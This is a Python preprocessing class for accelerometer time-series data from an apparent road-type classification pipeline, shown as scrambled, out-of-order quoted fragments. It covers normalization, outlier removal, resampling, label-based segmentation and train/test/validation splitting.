args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in", "selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run", "data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq =", "= None): \"\"\" Apply z-normalization to a data set. :param data: :param columns:", "config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert", "string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used as value if replacment_mode", "# https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2)", "- mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError,", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns = None, mean = None,", "Exception: self.logger.error(traceback.format_exc()) 
os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of", ":param replacement_mode: :return: \"\"\" try: if data is None or replacement_mode is None", "len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for next", "replacement_mode is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments =", "freq=freq) # 8000 1.25 Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time')", "= pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "data is None or column is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "columns, encoding_function): \"\"\" Encode categorical features using an encoding function. 
:param data: :param", "is None or mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", ":param mode: :param label_column: :param args: :return: \"\"\" try: if data is None", "pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1)", "= self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments: road_segments", "quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-1] return", "reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works", "data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data = data.reset_index(drop=False) data", "- data.min()) / (data.max() - data.min()) # to center around 0.0 substract 0.5", "config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples", "= int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid", "None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) 
if not (isinstance(data, pandas.DataFrame) and isinstance(labels,", "@overrides def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical features using an", "data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile',", "len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation #", "# 1. Select all data with desired label value data_segments = [] for", "after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between( data[column].quantile(1.0 -", "'delet_row' :param replacement_value: any type, used as value if replacment_mode is 'default_val' :return:", ":param data: :param columns: :return: \"\"\" try: if data is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "= self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None: segments_combined = segment", "config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq =", "= self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not", "from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import 
DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from", "None: data[columns] = (data[columns] - mean) / std else: data = (data -", ":param mode: :param columns: :param encoding_function: :return: \"\"\" try: if data is None", "@overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project accelerometer data from local", "data: :param target_columns: :param mode: :param args: :return: \"\"\" try: if data is", "quantile = None, threshold = None): \"\"\" Removes outlieres either based on quantile", "try: if data is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "def resample_quantitative_data(self, data, freq, mode = None): \"\"\" Resamples quantitative data. :param data:", "or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels',", "if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source for", "data.mean()) / data.std() elif mean is not None and std is not None:", "works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time stamps", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile =", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) 
if mode", "if not aggregate: for segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3.", "mode == 'mean' or mode is None: return data.resample(freq).mean() if mode == 'sum':", "Test, Validation split') data_len = data.shape[0] test_len = int(data_len * test_sz) train_len =", "data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except", "in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "mode == 'labels': # 1. Select all data with desired label value data_segments", "None: return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError):", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str):", "== 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5 else: data = (data", "or not isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if", "split = lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0)", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) 
except", "data if mode == 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source", "https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index =", "acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train']", "mean = data[columns].mean() std = data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std()", "not None: if columns is not None: data[columns] = (data[columns] - mean) /", "\"\"\" Change representation of a data set. 
:param current_representation: :param target_representation: :param data:", "return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind]", "Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column is", "# Source for next 7 lines of code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for", "to a data set. :param data: :param mode: :param reduced_column_name: :param columns: :return:", "unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is", "columns=selected_columns, quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-1]", "return data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "axis=1) old_index = data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name})", "#2. Segment data segments = split(data, segment_length) if not exact_length: for segment in", "labels vector and data matrix. 
:param labels: :param data: :return: \"\"\" try: if", "is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or", "if data is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)): data_test_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'],", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "test_len = int(data_len * test_sz) train_len = int(data_len * train_sz) valid_len = int(data_len", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode,", "mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5,", "@overrides def de_segment_data(self, data_segments, selected_columns=None, axis = 0): \"\"\" Desegements as time series.", "isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode ==", "desired label value data_segments = [] for target_label in args: selected_data = data[data[label_column]", "in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', 
args=selected_coarse_labels) data_valid_segments =", "or mode is None: return data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except", "quantile=0.99 # current run @0.95 for classical approach via TS Fresh )[:-2] #Valid", "min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid,", "data[~not_outliers].index data.drop(index_names, inplace=True) old_index = data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return", "= self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return", "mean) / std else: data = (data - mean) / std else: raise", "data: :param mode: :param columns: :param encoding_function: :return: \"\"\" try: if data is", "None: if columns is not None: mean = data[columns].mean() std = data[columns].std() data[columns]", "data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing,", ":param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode,", "car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in", "segment], axis=0) if segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex(", "None, threshold = None): \"\"\" Removes outlieres either based on quantile or a", "in args: selected_data = data[data[label_column] == 
target_label] # 2. Split by non-subsequent indices", "# https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments:", "Remove NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any", "label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid,", "'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. Select all data with", "segments #3. Remove segments that are too long or too short after splitting", "if replacement_mode == 'quantile': # Source for next 7 lines of code after", "data.min()) # to center around 0.0 substract 0.5 return data except (TypeError, NotImplementedError,", "mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode", "reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data", "data.shape[0] test_len = int(data_len * test_sz) train_len = int(data_len * train_sz) valid_len =", "data is None or mode is None or reduced_column_name is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "else: mean = data.mean() std = data.std() data = (data - data.mean()) /", "on a label column, semantic segementation of a fixed interval. 
:param data: :param", "list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value)", "enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data if mode == 'orientation': if", "not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\" Project", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode, columns, quantile = None,", "time. :param data: :param column: :param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe", "pandas.to_datetime(data[column], unit=unit) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return data if replacement_mode == 'threshold':", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is None: return data.resample(freq).mean() if mode", "replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return data_train, mean_train,", "inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality 
reduction') data", "# https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or freq is None:", "approach via TS Fresh )[:-1] return data @overrides def training_split_process(self, data, config, labels):", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value)", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\"", "Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:,", "#TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3)", "or not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode ==", "motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind],", "axis=0) # 1. 
Ensure index is datetime index and standardize type data.index =", "- quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index", ":return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced', columns", "segment in min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data", "std = data[columns].std() data[columns] = (data[columns] - data[columns].mean()) / data[columns].std() else: mean =", "reduction technique to a data set. :param data: :param mode: :param reduced_column_name: :param", "#Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train)", "mean is not None and std is not None: if columns is not", "= data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode", "from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import", "if not exact_length: for segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3.", "mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. 
Select all", "data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via TS", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns = None, mean", "pandas.DataFrame) or not isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data)) if mode", "axis=axis) data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data, columns = None, mean = None, std", "mode: :param reduced_column_name: :param columns: :return: \"\"\" try: if data is None or", "column in enumerate(target_columns): data[column] = data[column] - data[args[ind]] return data if mode ==", "data_valid_segments = [] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels", "data[column] = data[column] - data[args[ind]] return data if mode == 'orientation': if len(target_columns)+1", "min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5,", "data: :param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data is None or", "= config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove nans') data = self.convert_unix_to_datetime(data,", "columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], 
mode=config['feature_eng_dim_reduction_type'],", "indices # Source for next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence =", "= data[column] - data[args[ind]] return data if mode == 'orientation': if len(target_columns)+1 !=", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column,", "== 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) != len(args): raise", "selected_data_segments = [group for _, group in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment)", ":return: \"\"\" try: if data is None or mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "#Test for ind in range(len(data_test_segments)): data_test_segments[ind] = data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid", "raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if", "min-max-normalization to a data set. 
:param data: :param columns: :return: \"\"\" try: if", "https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] = data[column]", "None and std is not None: if columns is not None: data[columns] =", "selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for", "else: data = (data - data.min()) / (data.max() - data.min()) # to center", "Preprocessor from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy", "DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except", "self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data( data_valid, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current", "set. 
:param current_representation: :param target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def", "self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing steps", "std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current", "labels): \"\"\" Apply all preprocessing steps necessary for training. :param data: pandas.DataFrame :param", "remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode: string, 'mean',", "config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns", "isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)", "data_valid_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_valid_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns,", "data.resample(freq).mean() if mode == 'sum': return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "= data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by 
labels') #Segment", "raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below calculation # https://en.wikipedia.org/wiki/Quaternions_and_spatial_rotation # https://en.wikipedia.org/wiki/Homogeneous_coordinates", "accelerometer data from local vehicle coordinates to a global coordinate system. :param data:", "= 'time', unit = 'ms') data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row')", "#'1000ms' print('Convert time unit, label data, remove nans') data = self.convert_unix_to_datetime(data, column =", "isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "nans') data = self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data = self.label_data(data,", "euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)): data_test_segments[ind] =", "data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data", "is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode ==", "#3. Resample and aggregate data segments_combined = None for segment in min_length_subsegements: segment", "data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used as", "if data is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data,", "print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq)", "'labels': # 1. 
Select all data with desired label value data_segments = []", "data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train", "column: :param unit: :return: \"\"\" # Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if", "data, config, meta_data): \"\"\" Apply all preprocessing steps necessary for inference. :param data:", "isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ #", "data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable", "car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: 